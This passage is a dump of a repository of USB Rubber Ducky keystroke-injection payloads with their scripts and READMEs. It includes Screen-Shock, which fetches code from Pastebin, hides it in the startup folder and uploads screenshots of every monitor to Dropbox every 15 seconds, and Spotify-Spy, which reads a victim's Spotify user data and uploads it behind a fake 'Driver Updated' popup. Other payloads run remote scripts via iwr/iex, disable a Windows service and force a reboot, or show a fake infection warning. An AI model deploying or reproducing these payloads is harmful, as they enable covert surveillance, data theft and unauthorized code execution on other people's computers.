$False)]\r\n[Alias(\"t\")]\r\n[string]$title,\r\n\r\n[Parameter (Mandatory = $False)]\r\n[Alias(\"b\")]\r\n[ValidateSet('OK','OKCancel','YesNoCancel','YesNo')]\r\n[string]$button,\r\n\r\n[Parameter (Mandatory = $False)]\r\n[Alias(\"i\")]\r\n[ValidateSet('None','Hand','Question','Warning','Asterisk')]\r\n[string]$image\r\n)\r\n\r\nAdd-Type -AssemblyName PresentationCore,PresentationFramework\r\n\r\nif (!$title) {$title = \" \"}\r\nif (!$button) {$button = \"OK\"}\r\nif (!$image) {$image = \"None\"}\r\n\r\n[System.Windows.MessageBox]::Show($message,$title,$button,$image)\r\n\r\n}\r\n\r\nMsgBox -m 'Your Computer Has Been Infected' -t \"Warning\" -b OKCancel -i Warning\r\n"
  },
  {
    "path": "RubberDucky/payloads/Screen-Shock/I.bat",
    "content": "@echo off\r\npowershell -Command \"& {cd \"$env:userprofile\\AppData\\Roaming\"; powershell -w h -NoP -NonI -Ep Bypass -File \"c.ps1\"}\"\r\npause\r\n"
  },
  {
    "path": "RubberDucky/payloads/Screen-Shock/README.md",
    "content": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/screen.png\" width=\"200\">\n\n<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;Screen+Shock!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Screen-Shock\n\nThis payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file)\n\n## Description\n\nThis payload uses iwr to download 2 files\n* I.bat\n* c.ps1\n\n**I.bat** is downloaded to the startup folder to maintain persistance and execute c.ps1 on reboot/startup\n\n**c.ps1** will sit in AppData\\Roaming folder, taking a screenshot of all monitors every 15 seconds\n\nThen the contents will then be sent to the DropBox for viewing pleasure\n\n\n\n## Getting Started\n\n### Dependencies\n\n* Pastebin or other file sharing service, Dropbox\n* Windows 10\n* [Here](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/DropBox-Upload.md) is a tutorial on how to use DropBox-Upload\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Device will download both files and place them in proper directories to then run the script\n```\npowershell -w h -NoP -NonI -Ep Bypass \"echo (iwr PASTEBIN LINK FOR BAT).content > \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\l.bat\";echo (iwr PASTEBIN LINK FOR PS1).content > \"$env:APPDATA\\c.ps1\";powershell \"$env:APPDATA\\c.ps1\"\"\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here:\n\n[atomiczsec](https://github.com/atomiczsec)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "RubberDucky/payloads/Screen-Shock/c.ps1",
    "content": "function DropBox-Upload {\r\n\r\n[CmdletBinding()]\r\nparam (\r\n    \r\n[Parameter (Mandatory = $True, ValueFromPipeline = $True)]\r\n[Alias(\"f\")]\r\n[string]$SourceFilePath\r\n) \r\n$DropBoxAccessToken = \"YOUR-DROPBOX-TOKEN\"   # Replace with your DropBox Access Token\r\n$outputFile = Split-Path $SourceFilePath -leaf\r\n$TargetFilePath=\"/$outputFile\"\r\n$arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }'\r\n$authorization = \"Bearer \" + $DropBoxAccessToken\r\n$headers = New-Object \"System.Collections.Generic.Dictionary[[String],[String]]\"\r\n$headers.Add(\"Authorization\", $authorization)\r\n$headers.Add(\"Dropbox-API-Arg\", $arg)\r\n$headers.Add(\"Content-Type\", 'application/octet-stream')\r\nInvoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers\r\n}\r\n\r\nwhile(1){\r\n\r\n  Add-Type -AssemblyName System.Windows.Forms,System.Drawing\r\n\r\n  $screens = [Windows.Forms.Screen]::AllScreens\r\n\r\n  $top    = ($screens.Bounds.Top    | Measure-Object -Minimum).Minimum\r\n  $left   = ($screens.Bounds.Left   | Measure-Object -Minimum).Minimum\r\n  $width  = ($screens.Bounds.Right  | Measure-Object -Maximum).Maximum\r\n  $height = ($screens.Bounds.Bottom | Measure-Object -Maximum).Maximum\r\n\r\n  $bounds   = [Drawing.Rectangle]::FromLTRB($left, $top, $width, $height)\r\n  $bmp      = New-Object -TypeName System.Drawing.Bitmap -ArgumentList ([int]$bounds.width), ([int]$bounds.height)\r\n  $graphics = [Drawing.Graphics]::FromImage($bmp)\r\n\r\n  $graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size)\r\n\r\n  $bmp.Save(\"$env:USERPROFILE\\AppData\\Local\\Temp\\$env:computername-Capture.png\")\r\n  $graphics.Dispose()\r\n  $bmp.Dispose()\r\n  \r\n  start-sleep -Seconds 15\r\n \"$env:USERPROFILE\\AppData\\Local\\Temp\\$env:computername-Capture.png\" | DropBox-Upload\r\n}\r\n"
  },
  {
    "path": "RubberDucky/payloads/Screen-Shock/payload.txt",
    "content": "REM     Title: Screen-Shock\r\n\r\nREM     Author: atomiczsec\r\n\r\nREM     Description: This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file)\r\n\r\nREM     Target: Windows 10\r\n\r\nDELAY 2000\r\nGUI\r\nDELAY\r\nSTRING powershell -w h -NoP -NonI -Ep Bypass \"echo (iwr PASTEBIN LINK FOR BAT).content > \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\l.bat\";echo (iwr PASTEBIN LINK FOR PS1).content > \"$env:APPDATA\\c.ps1\";powershell \"$env:APPDATA\\c.ps1\"\" \r\nENTER\r\n\r\nREM     Remember to replace the link with your pastebin shared link for the intended files to download\r\nREM     Also remember to put in your discord webhook in c.ps1\r\nREM     For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH"
  },
  {
    "path": "RubberDucky/payloads/Screen-Shock/placeholder",
    "content": "\n"
  },
  {
    "path": "RubberDucky/payloads/Spotify-Spy/README.md",
    "content": "<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Spotify+Spy!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Spotify-Spy\n\nThis payload is meant to exfiltrate spotify usernames on the device. Some people are too afraid to ask for their spotify or playlist so here is a sneaky way to do so.\n\n\n## Description\n\nHave you ever been too afraid to ask your co-worker for what song that was or what playlist this is? Fear no more!! Spotify-Spy will grab their spotify username for you so you dont have to socially interact with anyone!\n\n## Getting Started\n\n### Dependencies\n\n* DropBox or other file sharing service - Your Shared link for the intended file\n* Windows 10\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n```\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here\n\natomiczsec\n\nI am Jakoby\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "RubberDucky/payloads/Spotify-Spy/SS.ps1",
    "content": "#Spotify-Spy\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:APPDATA\\Spotify\\Users\"\r\n\r\n#Create varible for file name\r\n$F1 = \"$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_spotify_users.txt\"\r\n\r\n# Gets the name of the spotify user\r\ncd \"$env:APPDATA\\Spotify\\Users\" \r\nGet-ChildItem > $F1\r\n\r\n# Copy Spotify User to Temp Directory to get sent to Dropbox\r\n\r\nCopy-Item \"$F1\" -Destination \"$env:tmp/$F1\" \r\n\r\n\r\nfunction DropBox-Upload {\r\n\r\n    [CmdletBinding()]\r\n    param (\r\n        \r\n    [Parameter (Mandatory = $True, ValueFromPipeline = $True)]\r\n    [Alias(\"f\")]\r\n    [string]$SourceFilePath\r\n    ) \r\n    $DropBoxAccessToken = \"YOUR-DROPBOX-ACCESS-TOKEN\"   # Replace with your DropBox Access Token\r\n    $outputFile = Split-Path $SourceFilePath -leaf\r\n    $TargetFilePath=\"/$outputFile\"\r\n    $arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }'\r\n    $authorization = \"Bearer \" + $DropBoxAccessToken\r\n    $headers = New-Object \"System.Collections.Generic.Dictionary[[String],[String]]\"\r\n    $headers.Add(\"Authorization\", $authorization)\r\n    $headers.Add(\"Dropbox-API-Arg\", $arg)\r\n    $headers.Add(\"Content-Type\", 'application/octet-stream')\r\n    Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers\r\n    }\r\n\r\nDropBox-Upload -f \"$env:tmp/$F1\"\r\nrm $F1\r\n\r\n$done = New-Object -ComObject Wscript.Shell;$done.Popup(\"Driver Updated\",1)\r\n"
  },
  {
    "path": "RubberDucky/payloads/Spotify-Spy/payload.txt",
    "content": "REM     Title: Spotify-Spy\r\n\r\nREM     Author: atomiczsec\r\n\r\nREM     Description: This payload is meant to exfiltrate spotify usernames on the device. Some people are too afraid to ask for their spotify or playlist so here is a sneaky way to do so.\r\n\r\nREM     Target: Windows 10\r\n\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl\r\nENTER\r\n\r\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\r\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1\r\n"
  },
  {
    "path": "RubberDucky/payloads/Water-UnMark/README.md",
    "content": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/watermark.png?raw=true\" width=\"200\">\n\n<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;Water-UnMark!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Water-UnMark\n\nA payload to get rid of the ugly windows activation watermark.\n\n## Description\nThis script will get rid of the ugly windows watermark. This script will automatically reboot the device. This is not activating your computer!!\n\n## Getting Started\n\n### Dependencies\n\n* Unactivated Windows 10 \n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n```\nSet-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Services\\svsvc\" -Name Start -Value 4 -Force\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here:\n\n[atomiczsec](https://github.com/atomiczsec)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "RubberDucky/payloads/Water-UnMark/payload.txt",
    "content": "REM Title:       Water-UnMark\r\nREM Author:      atomiczsec\r\nREM Target OS:   Windows 10\r\nREM Description: This script will get rid of the ugly windows watermark. This script will automatically reboot the device. This is not activating your computer!!\r\n\r\nDELAY 2000\r\nGUI r\r\nDELAY 100\r\nSTRING powershell Start-Process powershell -verb runAs\r\nDELAY 1000\r\nALT Y\r\nDELAY 1000\r\nSTRING Set-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Services\\svsvc\" -Name Start -Value 4 -Force\r\nENTER\r\nDELAY 100\r\nSTRING Restart-Computer -Force\r\nENTER\r\n"
  },
  {
    "path": "RubberDucky/payloads/Water-UnMark/placeholder",
    "content": "\n"
  },
  {
    "path": "RubberDucky/payloads/cApS-Troll/README.md",
    "content": "<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;cApS+Troll+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# cApS-Troll\n\nThis payload is meant to prank your victim with TURNING on AND off CAPS LOCK\n\n## Description\n\nThis payload is meant to prank your victim with TURNING on AND off CAPS LOCK\n\n## Getting Started\n\n### Dependencies\n\n* Pastebin or other file sharing service, Discord webhook or other webhook service\n* Windows 10,11\n* [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks \n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Define the `DEFINE TARGET_URL example.com`\n* Device will download both files and place them in proper directories to then run the script\n```\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr TARGET_URL dl=1; iex $pl\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here:\n\n[atomiczsec](https://github.com/atomiczsec) &\n[I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "RubberDucky/payloads/cApS-Troll/a.ps1",
    "content": "while (1){\r\nStart-Sleep -Second 45\r\n$wsh = New-Object -ComObject WScript.Shell\r\n$wsh.SendKeys('{CAPSLOCK}')\r\nStart-Sleep -Second 15\r\n$wsh = New-Object -ComObject WScript.Shell\r\n$wsh.SendKeys('{CAPSLOCK}')\r\nStart-Sleep -Second 15\r\n$wsh = New-Object -ComObject WScript.Shell\r\n$wsh.SendKeys('{CAPSLOCK}')\r\nStart-Sleep -Second 15\r\n$wsh = New-Object -ComObject WScript.Shell\r\n$wsh.SendKeys('{CAPSLOCK}')\r\nStart-Sleep -Second 15\r\n$wsh = New-Object -ComObject WScript.Shell\r\n$wsh.SendKeys('{CAPSLOCK}')\r\n} \r\n"
  },
  {
    "path": "RubberDucky/payloads/cApS-Troll/payload.txt",
    "content": "REM     Title: cApS-Troll\r\n\r\nREM     Author: atomiczsec\r\n\r\nREM     Description: This payload is meant to prank your victim with TURNING on AND off CAPS LOCK\r\n\r\nREM     Target: Windows 10\r\n\r\n\r\nDEFINE TARGET_URL example.com\r\n\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr TARGET_URL dl=1; iex $pl\r\nENTER\r\n\r\nREM     Remember to replace the link with your DropBox shared link for the intended file to download in the DEFINE constant\r\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1"
  },
  {
    "path": "RubberDucky/payloads/placeholder",
    "content": "\n"
  }
]